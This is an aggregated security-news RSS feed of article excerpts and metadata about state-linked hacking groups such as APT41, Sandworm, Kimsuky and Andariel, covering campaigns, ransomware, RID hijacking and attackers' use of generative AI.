www.secnews.physaphae.fr
This is the RSS 2.0 feed from www.secnews.physaphae.fr. It is a simple aggregated flow of multiple article sources. The list of sources can be found on www.secnews.physaphae.fr.
Feed generated: 2025-05-10T23:18:03+00:00

Reversemode (reverse engineering blog) | Spain's blackout: Cyber or Not? An unbiased technical analysis
Introduction. Yesterday afternoon, I was writing what should have been the regular newsletter when the power suddenly went out. I wasn't alarmed at all because I live in a mountain area, and power outages like this happen several times a year. It was a slightly windy day, so I assumed that maybe a tree had cracked and hit a low-voltage line or something similar. But, as it turns out, that wasn't the case. Instead, something unprecedented occurred, a 'zero energy' event: the power grid in Spain and Portugal went down completely.
As we can see from the following graph from Red Eléctrica Española (the transmission system operator responsible for managing the Spanish electricity system), at 12:35pm 15 GW of generation power suddenly went 'missing'. As the prime minister would explain during a press release: "in 5 seconds, 60% of the country's demand disappeared from the system".
The interconnected power system is one of the most complex systems ever built. It is beyond the scope of this article to provide a detailed technical assessment of all possible non-cyber scenarios that could contribute to a 'black swan' event. In fact, investigations into large-scale power outages typically take months to reach reliable conclusions. Therefore, I will leave this task to the experts, who have access to the data needed to conduct such a complex analysis.
However, there is specific information suggesting that a potential cyber attack could be behind this. For example:
https://www.larazon.es/economia/cni-apunta-ciberataque-como-posible-causa-apagon_20250428680f7e19319ae75da4ba8c32.html
The President of the regional government of Andalusia (Spain) claims that, after consulting with cybersecurity experts, the massive power outage is likely the result of a cyber attack.
https://www.eleconomista.es/energia/noticias/13337515/04/25/juanma-moreno-apunta-a-un-ciberataque-como-posible-causa-del-gran-apagon-en-espana.html
Meanwhile, top European figures such as the European Council p
Published: 2025-04-29T11:04:11+00:00
Original: https://www.reversemode.com/2025/04/spains-blackout-cyber-or-not-unbiased.html
Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8669358
Tags: Ransomware, Malware, Threat, Studies, Prediction, Technical; APT 44

GB Hacker (reverse engineering blog) | KeyPlug Malware Server Leak Exposes Fortinet Firewall and VPN Exploitation Tools
Cybersecurity researchers have stumbled upon a treasure trove of operational tools and scripts linked to the KeyPlug malware, associated with the threat group RedGolf, also known as APT41. The server, which was inadvertently exposed for less than 24 hours, provided an unprecedented glimpse into the sophisticated tactics, techniques, and procedures (TTPs) employed by this advanced […]
Published: 2025-04-18T11:53:49+00:00
Original: https://gbhackers.com/keyplug-malware-server/
Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8664457
Tags: Malware, Tool, Threat; APT 41
Cyble (CyberSecurity Firm) | Hacktivists Target Critical Infrastructure, Move Into Ransomware
Overview
According to a new Cyble report, hacktivists are increasingly moving beyond traditional activities such as DDoS attacks and website defacements into more sophisticated critical infrastructure and ransomware attacks. In a report for clients, Cyble said that hacktivism has "transformed into a complex instrument of hybrid warfare" with the rise of groups that have adopted more sophisticated attack techniques more commonly associated with nation-state actors and financially motivated threat groups. Hacktivism "is no longer limited to marginal ideological outbursts," according to the report. "It is now a decentralized cyber-insurgency apparatus, capable of shaping geopolitical narratives, destabilizing critical systems, and engaging directly in global conflicts across the digital domain." The Cyble report examined the most active hacktivist groups in the first quarter of 2025, the most targeted nations and sectors, emerging attack techniques, and more.
The most active hacktivist groups target critical infrastructure
Pro-Russian hacktivists were the most active in the first quarter, led by NoName057(16), Hacktivist Sandworm
Published: 2025-04-15T08:22:39+00:00
Original: https://cyble.com/blog/hacktivists-infrastructure-move-into-ransomware/
Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8662999
Tags: Ransomware, Tool, Vulnerability, Threat, Legislation, Industrial, Prediction, Cloud, Technical; APT 44

Cyble (CyberSecurity Firm) | Russia-Linked Actors Exploiting Signal Messenger's "Linked Devices" Feature for Espionage in Ukraine
Overview
Google Threat Intelligence Group (GTIG) has identified multiple Russia-aligned threat actors actively targeting Signal Messenger accounts as part of a multi-year cyber espionage operation. The campaign, likely driven by Russia's intelligence-gathering objectives during its invasion of Ukraine, aims to compromise the secure communications of military personnel, politicians, journalists, and activists. The tactics observed in this campaign include phishing attacks abusing Signal's linked devices feature, malicious JavaScript payloads, and malware designed to steal Signal messages from compromised Android and Windows devices. While the focus remains on Ukrainian targets, the threat is expected to expand globally as adversaries refine their techniques. Google has partnered with Signal to introduce security enhancements that mitigate these attack vectors, urging users to update to the latest versions of the app.
Tactics Used to Compromise Signal Accounts
Exploiting Signal's "Linked Devices" Feature
Russia-aligned threat actors have manipulated Signal's legitimate linked devices functionality to gain persistent access to victim accounts. By tricking users into scanning malicious QR codes, attackers can link an actor-controlled device to the victim's account, enabling real-time message interception without full device compromise. The phishing methods used to deliver these malicious QR codes include:
Fake Signal group invites containing altered JavaScript redirects.
Phishing pages masquerading as Ukrainian military applications.
Published: 2025-02-20T13:21:16+00:00
Original: https://cyble.com/blog/germany-strengthening-cybersecurity-2/
Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8649243
Tags: Malware, Tool, Vulnerability, Threat, Mobile, Cloud, Conference; APT 44

Mandiant (Mandiant security blog) | Signals of Trouble: Multiple Russia-Aligned Threat Actors Actively Targeting Signal Messenger
Google Threat Intelligence Group (GTIG) has observed increasing efforts from several Russia state-aligned threat actors to compromise Signal Messenger accounts used by individuals of interest to Russia's intelligence services. While this emerging operational interest has likely been sparked by wartime demands to gain access to sensitive government and military communications in the context of Russia's re-invasion of Ukraine, we anticipate the tactics and methods used to target Signal will grow in prevalence in the near term and proliferate to additional threat actors and regions outside the Ukrainian theater of war. Signal's popularity among common targets of surveillance and espionage activity, such as military personnel, politicians, journalists, activists, and other at-risk communities, has positioned the secure messaging application as a high-value target for adversaries seeking to intercept sensitive information that could fulfil a range of different intelligence requirements. More broadly, this threat also extends to other popular messaging applications such as WhatsApp and Telegram, which are also being actively targeted by Russian-aligned threat groups using similar techniques.
In anticipation of a wider adoption of similar tradecraft by other threat actors, we are issuing a public warning regarding the tactics and methods used to date to help build public awareness and help communities better safeguard themselves from similar threats. We are grateful to the team at Signal for their close partnership in investigating this activity. The latest Signal releases on Android and iOS contain hardened features designed to help protect against similar phishing campaigns in the future. Update to the latest version to enable these features.
Phishing Campaigns Abusing Signal's "Linked Devices" Feature
The most novel and widely used technique underpinning Russian-aligned attempts to compromise Signal accounts is the abuse of the app's legitimate "linked devices" feature that enables Signal to be used on multiple devices concurrently. Because linking an additional device typically requires scanning a quick-response (QR) code, threat actors have resorted to crafting malicious QR codes that, when scanned, will link a victim's account to an actor-controlled Signal instance. If successful, future messages will be delivered synchronously to both the victim and the threat actor in real time, providing a persistent means to eavesdrop on the victim's secure conversations without the need for full-device compromise.
Published: 2025-02-19T14:00:00+00:00
Original: https://cloud.google.com/blog/topics/threat-intelligence/russia-targeting-signal-messenger/
Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8648980
Tags: Malware, Threat, Mobile, Cloud, Commercial; APT 44

The Hacker News (The Hacker News is a hacking news blog, surprising, right?) | Winnti APT41 Targets Japanese Firms in RevivalStone Cyber Espionage Campaign
The China-linked threat actor known as Winnti has been attributed to a new campaign dubbed RevivalStone that targeted Japanese companies in the manufacturing, materials, and energy sectors in March 2024. The activity, detailed by Japanese cybersecurity company LAC, overlaps with a threat cluster tracked by Trend Micro as Earth Freybug, which has been assessed to be a subset within the APT41
Published: 2025-02-18T15:22:00+00:00
Original: https://thehackernews.com/2025/02/winnti-apt41-targets-japanese-firms-in.html
Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8648844
Tags: Threat, Prediction; APT 41

IndustrialCyber (cyber risk firms for industrial) | Microsoft details Seashell Blizzard BadPilot campaign targeting energy, telecom, government sectors
Microsoft has published its first research on a subgroup within the Russian state actor Seashell Blizzard, detailing a...
Published: 2025-02-13T22:27:57+00:00
Original: https://industrialcyber.co/ransomware/microsoft-details-seashell-blizzard-badpilot-campaign-targeting-energy-telecom-government-sectors/
Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8648429
Tags: APT 44

HackRead (cyber search) | Microsoft Uncovers 'BadPilot' Campaign as Seashell Blizzard Targets US and UK
Russian GRU-linked hackers exploit known software flaws to breach critical networks worldwide, targeting the United States and the…
Published: 2025-02-13T21:27:54+00:00
Original: https://hackread.com/microsoft-badpilot-campaign-seashell-blizzard-usa-uk/
Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8648424
Tags: Threat; APT 44

The Hacker News (The Hacker News is a hacking news blog, surprising, right?) | North Korean APT43 Uses PowerShell and Dropbox in Targeted South Korea Cyberattacks
A nation-state threat actor with ties to North Korea has been linked to an ongoing campaign targeting South Korean business, government, and cryptocurrency sectors. The attack campaign, dubbed DEEP#DRIVE by Securonix, has been attributed to a hacking group known as Kimsuky, which is also tracked under the names APT43, Black Banshee, Emerald Sleet, Sparkling Pisces, Springtail, TA427, and Velvet
Published: 2025-02-13T19:56:00+00:00
Original: https://thehackernews.com/2025/02/north-korean-apt43-uses-powershell-and.html
Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8648389
Tags: Threat; APT 43

InfoSecurity Mag (InfoSecurity Magazine) | Russian Seashell Blizzard Enlists Specialist Initial Access Subgroup to Expand Ops
Microsoft found that Russian state actor Seashell Blizzard has deployed an initial access subgroup to gain persistent access in a range of high-value global targets
Published: 2025-02-13T12:00:00+00:00
Original: https://www.infosecurity-magazine.com/news/russian-seashell-blizzard-initial/
Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8648351
Tags: APT 44

InformationSecurityBuzzNews (security news site) | Russia-Linked Seashell Blizzard Intensifies Cyber Operations Against Critical Sectors
The Russia-linked threat actor known as Seashell Blizzard has assigned one of its subgroups to gain initial access to internet-facing infrastructure and establish long-term persistence within targeted entities, a Microsoft report has revealed. Also dubbed APT44, BlackEnergy Lite, Sandworm, Telebots, and Voodoo Bear, Seashell Blizzard has been active since at least 2009 and is believed [...]
Published: 2025-02-13T06:02:16+00:00
Original: https://informationsecuritybuzz.com/russia-linked-seashell-blizzard-intens/
Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8648314
Tags: Threat; APT 44

The Hacker News (The Hacker News is a hacking news blog, surprising, right?) | Microsoft Uncovers Sandworm Subgroup's Global Cyber Attacks Spanning 15+ Countries
A subgroup within the infamous Russian state-sponsored hacking group known as Sandworm has been attributed to a multi-year initial access operation dubbed BadPilot that stretched across the globe. "This subgroup has conducted globally diverse compromises of Internet-facing infrastructure to enable Seashell Blizzard to persist on high-value targets and support tailored network operations," the
Published: 2025-02-12T22:32:00+00:00
Original: https://thehackernews.com/2025/02/microsoft-uncovers-sandworm-subgroups.html
Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8648239
Tags: APT 44

Recorded Future (Recorded Future feed) | Subgroup of Russia's Sandworm compromising US and European organizations, Microsoft says
The BadPilot hackers have expanded their focus beyond Ukraine and Eastern Europe, gaining initial access to dozens of strategically important organizations across the U.S. and U.K.
Published: 2025-02-12T18:14:48+00:00
Original: https://therecord.media/sandworm-subgroup-russia-europe
Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8648255
Tags: APT 44

CyberScoop (scoopnewsgroup.com special Cyber) | Russian state threat group shifts focus to US, UK targets
A subgroup of Seashell Blizzard exploited public vulnerabilities in internet-facing systems, Microsoft researchers said.
Published: 2025-02-12T17:58:47+00:00
Original: https://cyberscoop.com/russian-state-threat-group-shifts-focus/
Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8648237
Tags: Vulnerability, Threat; APT 44
Dark Reading (Informationweek Branch) | Microsoft: Russia's Sandworm APT Exploits Edge Bugs Globally
Sandworm (aka Seashell Blizzard) has an initial access wing called "BadPilot" that uses standard intrusion tactics to spread Russia's tendrils around the world.
Published: 2025-02-12T17:00:00+00:00
Original: https://www.darkreading.com/threat-intelligence/microsoft-russian-sandworm-apt-exploits-edge-bugs-globally
Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8648232
Tags: APT 44

Mandiant (Mandiant security blog) | Cybercrime: A Multifaceted National Security Threat
Published: 2025-02-11T20:00:00+00:00
Original: https://cloud.google.com/blog/topics/threat-intelligence/cybercrime-multifaceted-national-security-threat/
Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8648141
Tags: Ransomware, Malware, Tool, Vulnerability, Threat, Legislation, Medical, Cloud, Technical; APT 41, APT 38, APT 29, APT 43, APT 44

Techworm (News) | Hackers From China, North Korea, Iran & Russia Are Using Google's AI For Cyber Ops
said in its report. Google tracked this activity to more than ten Iran-backed groups, more than twenty China-backed groups, and nine North Korean-backed groups. For instance, Iranian threat actors were the biggest users of Gemini, using it for a wide range of purposes, including research on defense organizations, vulnerability research, and creating content for campaigns. In particular, the group APT42 (which accounted for over 30% of Iranian APT actors) focused on crafting phishing campaigns to target government agencies and corporations, conducting reconnaissance on defense experts and organizations, and generating content with cybersecurity themes. Chinese APT groups primarily used Gemini to conduct reconnaissance, script and develop, troubleshoot code, and research how to obtain deeper access to target networks through lateral movement, privilege escalation, data exfiltration, and detection evasion.
North Korean APT hackers were observed using Gemini to support multiple phases of the attack lifecycle, including researching potential infrastructure and free hosting providers, reconnaissance on target organizations, payload development, and help with malicious scripting and evasion methods. "Of note, North Korean actors also used Gemini to draft cover letters and research jobs, activities that would likely support North Korea's efforts to place clandestine IT workers at Western companies," the company noted. "One North Korea-backed group utilized Gemini to draft cover letters and proposals for job descriptions, researched average salaries for specific jobs, and asked about jobs on LinkedIn. The group also used Gemini for information about overseas employee exchanges. Many of the topics would be common for anyone researching and applying for jobs."
Meanwhile, Russian APT actors demonstrated limited use of Gemini, primarily for coding tasks such as converting publicly available malware into different programming languages and incorporating encryption functions into existing code. They may have avoided using Gemini for operational security reasons, opting to stay off Western-controlled platforms to avoid monitoring of their activities, or using Russian-made AI tools. Google said the Russian hacking group's use of Gemini has been relatively limited, possibly because it attempted to prevent Western platforms from monitoring its activities
Published: 2025-01-31T19:21:04+00:00
Original: https://www.techworm.net/2025/01/hackers-google-gemini-ai-for-cyber-ops.html
Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8645260
Tags: Malware, Tool, Vulnerability, Threat, Legislation, Cloud; APT 42

Mandiant (Mandiant security blog) | Adversarial Misuse of Generative AI
science, technology, and beyond. In cybersecurity, AI is poised to transform digital defense, empowering defenders and enhancing our collective security.
Large language models (LLMs) open new possibilities for defenders, from sifting through complex telemetry to secure coding, vulnerability discovery, and streamlining operations. However, some of these same AI capabilities are also available to attackers, leading to understandable anxieties about the potential for AI to be misused for malicious purposes.
Much of the current discourse around cyber threat actors' misuse of AI is confined to theoretical research. While these studies demonstrate the potential for malicious exploitation of AI, they don't necessarily reflect the reality of how AI is currently being used by threat actors in the wild. To bridge this gap, we are sharing a comprehensive analysis of how threat actors interacted with Google's AI-powered assistant, Gemini. Our analysis was grounded by the expertise of Google's Threat Intelligence Group (GTIG), which combines decades of experience tracking threat actors on the front lines and protecting Google, our users, and our customers from government-backed attackers, targeted 0-day exploits, coordinated information operations (IO), and serious cyber crime networks. We believe the private sector, governments, educational institutions, and other stakeholders must work together to maximize AI's benefits while also reducing the risks of abuse.
At Google, we are committed to developing responsible AI guided by our principles, and we share
Published: 2025-01-29T14:00:00+00:00
Original: https://cloud.google.com/blog/topics/threat-intelligence/adversarial-misuse-generative-ai/
Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8644222
Tags: Ransomware, Malware, Tool, Vulnerability, Threat, Studies, Legislation, Mobile, Industrial, Cloud, Technical, Commercial; APT 41, APT 43, APT 42

Mandiant (Mandiant security blog) | ScatterBrain: Unmasking the Shadow of PoisonPlug's Obfuscator
Introduction
Since 2022, Google Threat Intelligence Group (GTIG) has been tracking multiple cyber espionage operations conducted by China-nexus actors utilizing POISONPLUG.SHADOW. These operations employ a custom obfuscating compiler that we refer to as "ScatterBrain," facilitating attacks against various entities across Europe and the Asia Pacific (APAC) region. ScatterBrain appears to be a substantial evolution of ScatterBee, an obfuscating compiler previously analyzed by PwC. GTIG assesses that POISONPLUG is an advanced modular backdoor used by multiple distinct, but likely related, threat groups based in the PRC; however, we assess that POISONPLUG.SHADOW usage appears to be further restricted to clusters associated with APT41.
GTIG currently tracks three known POISONPLUG variants:
POISONPLUG
POISONPLUG.DEED
POISONPLUG.SHADOW
[Figure: countries targeted by POISONPLUG.SHADOW]
POISONPLUG.SHADOW, often referred to as "Shadowpad," a malware family name first introduced by Kaspersky, stands out due to its use of a custom obfuscating compiler specifically designed to evade detection and analysis. Its complexity is compounded not only by the extensive obfuscation mechanisms employed but also by the attackers' highly sophisticated threat tactics. These elements collectively make analysis exceptionally challenging and complicate efforts to identify, understand, and mitigate the associated threats it poses.
In addressing these challenges, GTIG collaborates closely with the FLARE team to dissect and analyze POISONPLUG.SHADOW. This partnership utilizes state-of-the-art reverse engineering techniques and the comprehensive threat intelligence capabilities required to mitigate the sophisticated threats posed by this threat actor. We remain dedicated to advancing methodologies and fostering innovation to adapt to and counteract the ever-evolving tactics of threat actors, ensuring the security of Google and our customers against sophisticated cyber espionage operations.
Overview
In this blog post, we present our in-depth analysis of the ScatterBrain obfuscator, which has led to the development of a complete stand-alone static deobfuscator library independent of any binary analysis frameworks. Our analysis is based solel
Published: 2025-01-28T14:00:00+00:00
Original: https://cloud.google.com/blog/topics/threat-intelligence/scatterbrain-unmasking-poisonplug-obfuscator/
Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8643871
Tags: Malware, Tool, Threat, Studies, Patching, Cloud; APT 41

Techworm (News) | Hackers Using RID Hijacking To Create Admin Accounts In Windows
wrote in a blog post published on Thursday. In Windows, a Relative Identifier (RID) is part of a Security Identifier (SID), which uniquely distinguishes each user and group within a domain. For instance, an administrator account has a RID value of "500", guest accounts "501", the domain admins group "512", and regular user accounts are assigned RIDs starting from "1000". In a RID hijacking attack, hackers change the RID of a low-privilege account to the same value as an administrator account. As a result, Windows grants administrative privileges to that account. However, to pull this off, attackers need write access to the SAM (Security Account Manager) registry, which requires them to already have SYSTEM-level access to the targeted machine.
Attackers typically use tools such as PsExec and JuicyPotato to escalate their privileges and launch a SYSTEM-level command prompt. While SYSTEM access is the highest privilege in Windows, it has certain limitations: it doesn't allow remote access, cannot interact with GUI apps, generates noisy activity that can be easily detected, and doesn't persist after a system reboot. To work around these issues, Andariel first created a hidden, low-privilege local user account by appending a "$" character to its username. This made the account invisible in regular listings but still accessible in the SAM registry. The attackers then carried out RID hijacking to escalate the account's privileges to the administrator level. According to the researchers, Andariel added the modified account to the Remote Desktop Users and Administrators groups, giving them more control over the system. The group tweaked the SAM registry using custom malware and an open-source tool to execute the RID hijacking. Although SYSTEM access could allow the direct creation of administrator accounts, this method is less conspicuous, making it difficult to detect and prevent. To avoid detection, Andariel also exported and backed up the modified registry settings, deleted the rogue account, and restored it later from the backup when needed, bypassing system logs and making detection even harder.
To reduce the risk of RID hijacking, system administrators should implement proactive measures such as:
Using the Local Security Authority (LSA) Subsystem Service to monitor unusual login attempts and password changes.
Preventing unauthorized access to the SAM registry.
Restricting the use of tools like PsExec and JuicyPotato.
Disabling guest accounts.
Enforcing multi-factor authentication (MFA) for all user accounts, including low-privileged ones.
Cybersecurity researchers at AhnLab have discovered that a North Korean threat group uses malicious files to hijack RIDs and grant admin access to low-privilege Windows accounts. According to researchers at ASEC, AhnLab's security intelligence center, the hacking group behind the attack is the "Andariel" threat group, linked to North Korea's Lazarus hacker group. "RID Hijacking is
Published: 2025-01-25T20:07:25+00:00
Original: https://www.techworm.net/2025/01/hacker-rid-hijacking-create-admin-accounts-windows.html
Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8642525
Tags: Malware, Tool, Threat; APT 38, APT 45
RiskIQ (cyber risk firms, now Microsoft) | Analysis of Attack Cases Against Korean Solutions by the Andariel Group (SmallTiger)
Published: 2024-12-30T19:16:07+00:00
Original: https://community.riskiq.com/article/14ca8afc
Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8631775
Tags: Malware, Tool, Vulnerability, Threat; APT 45

Netskope (Netskope is an American software company providing an IT security platform) | New Yokai Side-loaded Backdoor Targets Thai Officials
Summary
DLL side-loading is a popular technique used by threat actors to execute malicious payloads under the umbrella of a benign, usually legitimate, executable. This allows the threat actor to exploit whitelists in security products that exclude trusted executables from detection. Among others, this technique has been leveraged by APT41 to deploy DUSTTRAP and Daggerfly […]
Published: 2024-12-13T15:00:00+00:00
Original: https://www.netskope.com/blog/new-yokai-side-loaded-backdoor-targets-thai-officials
Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8624596
Tags: Threat; APT 41
RiskIQ (cyber risk firms, now Microsoft) | Likely China-based Attackers Target High-profile Organizations in Southeast Asia
Published: 2024-12-11T22:38:07+00:00
Original: https://community.riskiq.com/article/9dd28182
Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8623712
Tags: Malware, Tool, Threat, Cloud; APT 41

RiskIQ (cyber risk firms, now Microsoft) | Weekly OSINT Highlights, 9 December 2024
Published: 2024-12-09T12:22:03+00:00
Original: https://community.riskiq.com/article/86d339a0
Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8622260
Tags: Ransomware, Malware, Tool, Vulnerability, Threat, Mobile, Industrial, Prediction; APT 45

RiskIQ (cyber risk firms, now Microsoft) | Mauri Ransomware Threat Actors Exploiting Apache ActiveMQ Vulnerability (CVE-2023-46604)
Published: 2024-12-06T16:17:50+00:00
Original: https://community.riskiq.com/article/ccb7bd15
Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8620767
Tags: Ransomware, Tool, Vulnerability, Threat; APT 45

RiskIQ (cyber risk firms, now Microsoft) | CISA says BianLian Ransomware Now Focuses Only on Data Theft
Published: 2024-11-27T20:21:51+00:00
Original: https://community.riskiq.com/article/c958d17f
Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8618094
Tags: Ransomware, Tool, Threat; APT 45

RiskIQ (cyber risk firms, now Microsoft) | Helldown Ransomware: An Overview of this Emerging Threat
Published: 2024-11-22T21:45:45+00:00
Original: https://community.riskiq.com/article/2af97093
Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8616252
Tags: Ransomware, Malware, Tool, Vulnerability, Threat; APT 45

RiskIQ (cyber risk firms, now Microsoft) | Weekly OSINT Highlights, 18 November 2024
Published: 2024-11-18T12:22:31+00:00
Original: https://community.riskiq.com/article/2560112c
Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8613484
Tags: Ransomware, Malware, Tool, Vulnerability, Threat, Prediction, Medical, Cloud, Technical; APT 41, APT 38

Dark Reading (Informationweek Branch) | Toolkit Vastly Expands APT41's Surveillance Powers
The China-affiliated group is using the highly modular DeepData framework to target organizations in South Asia.
Published: 2024-11-13T22:39:34+00:00
Original: https://www.darkreading.com/cyberattacks-data-breaches/toolkit-expands-apt41s-surveillance-powers
Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8610664
Tags: APT 41

RiskIQ (cyber risk firms, now Microsoft) | Ymir: New Stealthy Ransomware in the Wild
Published: 2024-11-13T20:50:44+00:00
Original: https://community.riskiq.com/article/1444d044
Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8610633
Tags: Ransomware, Malware, Tool, Threat; APT 45

BlackBerry (hardware and software manufacturer) | LightSpy: APT41 Deploys Advanced DeepData Framework In Targeted Southern Asia Espionage Campaign
The threat actor behind LightSpy has expanded their toolset with the introduction of DeepData, a modular Windows-based surveillance framework that significantly broadens their espionage capabilities.
Published: 2024-11-12T09:01:00+00:00
Original: https://blogs.blackberry.com/en/2024/11/lightspy-apt41-deploys-advanced-deepdata-framework-in-targeted-southern-asia-espionage-campaign
Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8610605
Tags: Threat; APT 41

RiskIQ (cyber risk firms, now Microsoft) | Unpacking the Interlock ransomware attack
Published: 2024-11-11T18:57:29+00:00
Original: https://community.riskiq.com/article/048b77c8
Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8609479
Tags: Ransomware, Malware, Tool, Threat, Prediction, Medical, Cloud; APT 45

RiskIQ (cyber risk firms, now Microsoft) | Weekly OSINT Highlights, 4 November 2024
Published: 2024-11-04T12:25:16+00:00
Original: https://community.riskiq.com/article/d6da7f0d
Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8605948
Tags: Ransomware, Malware, Tool, Vulnerability, Threat, Mobile, Prediction, Medical, Cloud, Technical; APT 41, APT 28, APT 31, Guam

RiskIQ (cyber risk firms, now Microsoft) | Pacific Rim timeline: Information for defenders from a braid of interlocking attack campaigns
Published: 2024-10-31T20:29:50+00:00
Original: https://community.riskiq.com/article/798c0fdb
Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8604363
Tags: Malware, Tool, Vulnerability, Threat, Legislation, Cloud; APT 41, APT 31

RiskIQ (cyber risk firms, now Microsoft) | Jumpy Pisces Engages in Play Ransomware
Published: 2024-10-31T19:07:37+00:00
Original: https://community.riskiq.com/article/393b61a9
Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8604347
Tags: Ransomware, Malware, Tool, Threat, Prediction; APT 45

Dark Reading (Informationweek Branch) | North Korea's Andariel Pivots to 'Play' Ransomware Games
The prominent state-sponsored advanced persistent threat (APT), aka Jumpy Pisces, appears to be moving away from its primary cyber-espionage motives and toward wreaking widespread disruption and damage.
Published: 2024-10-31T15:28:56+00:00
Original: https://www.darkreading.com/endpoint-security/north-korea-andariel-play-ransomware
Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8604255
Tags: Ransomware, Threat; APT 45

The Hacker News (The Hacker News is a hacking news blog, surprising, right?) | North Korean Group Collaborates with Play Ransomware in Significant Cyber Attack
Threat actors in North Korea have been implicated in a recent incident that deployed a known ransomware family called Play, underscoring their financial motivations. The activity, observed between May and September 2024, has been attributed to a threat actor tracked as Jumpy Pisces, which is also known as Andariel, APT45, DarkSeoul, Nickel Hyatt, Onyx Sleet (formerly Plutonium), Operation Troy,
Published: 2024-10-30T21:14:00+00:00
Original: https://thehackernews.com/2024/10/north-korean-group-collaborates-with.html
Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8603784
Tags: Ransomware, Threat; APT 15, APT 45

The Hacker News (The Hacker News is a hacking news blog, surprising, right?) | Chinese Nation-State Hackers APT41 Hit Gambling Sector for Financial Gain
The prolific Chinese nation-state actor known as APT41 (aka Brass Typhoon, Earth Baku, Wicked Panda, or Winnti) has been attributed to a sophisticated cyber attack targeting the gambling and gaming industry. "Over a period of at least six months, the attackers stealthily gathered valuable information from the targeted company including, but not limited to, network configurations, user passwords,
Published: 2024-10-21T18:38:00+00:00
Original: https://thehackernews.com/2024/10/chinese-nation-state-hackers-apt41-hit.html
Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8601022
Tags: APT 41

RiskIQ (cyber risk firms, now Microsoft) | Technical Analysis of a Novel IMEEX Framework
Published: 2024-10-10T21:13:00+00:00
Original: https://community.riskiq.com/article/998e3172
Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8595647
Tags: Ransomware, Malware, Tool, Threat, Technical; APT 41

RiskIQ (cyber risk firms, now Microsoft) | Awaken Likho is awake: new techniques of an APT group
Published: 2024-10-08T05:14:51+00:00
Original: https://community.riskiq.com/article/6bedb4b5
Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8594036
Tags: Malware, Tool, Threat, Industrial; APT 45

RiskIQ (cyber risk firms, now Microsoft) | Weekly OSINT Highlights, 7 October
2024<br>Weekly OSINT Highlights, 7 October 2024 2024-10-07T16:54:11+00:00 https://community.riskiq.com/article/33015049 www.secnews.physaphae.fr/article.php?IdArticle=8593765 False Ransomware,Malware,Tool,Vulnerability,Threat,Mobile,Prediction,Cloud APT 37,APT 45 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) Les pirates coréens de N. déploient de nouveaux logiciels malveillants Klogexe et FPSPy dans des attaques ciblées<br>N. Korean Hackers Deploy New KLogEXE and FPSpy Malware in Targeted Attacks Threat actors with ties to North Korea have been observed leveraging two new malware strains dubbed KLogEXE and FPSpy. The activity has been attributed to an adversary tracked as Kimsuky, which is also known as APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (formerly Thallium), Sparkling Pisces, Springtail, and Velvet Chollima. "These samples enhance Sparkling Pisces\' already extensive arsenal]]> 2024-09-26T17:58:00+00:00 https://thehackernews.com/2024/09/n-korean-hackers-deploy-new-klogexe-and.html www.secnews.physaphae.fr/article.php?IdArticle=8585629 False Malware,Threat APT 43 2.0000000000000000 Dark Reading - Informationweek Branch Nord-Coréen APT contourne les politiques de courrier électronique du DMARC dans les attaques de cyber-espionnage<br>North Korean APT Bypasses DMARC Email Policies in Cyber-Espionage Attacks How the Kimsuky nation-state group and other threat actors are exploiting poor email security - and what organizations can do to defend themselves.]]> 2024-09-20T01:00:00+00:00 https://www.darkreading.com/threat-intelligence/north-korean-apt-bypasses-dmarc-email-cyber-espionage-attacks www.secnews.physaphae.fr/article.php?IdArticle=8579992 False Threat APT 43 4.0000000000000000 RiskIQ - cyber risk firms (now microsoft) Faits saillants hebdomadaires OSINT, 2 septembre 2024<br>Weekly OSINT Highlights, 2 September 2024 2024-09-02T19:54:58+00:00 https://community.riskiq.com/article/161e114f 
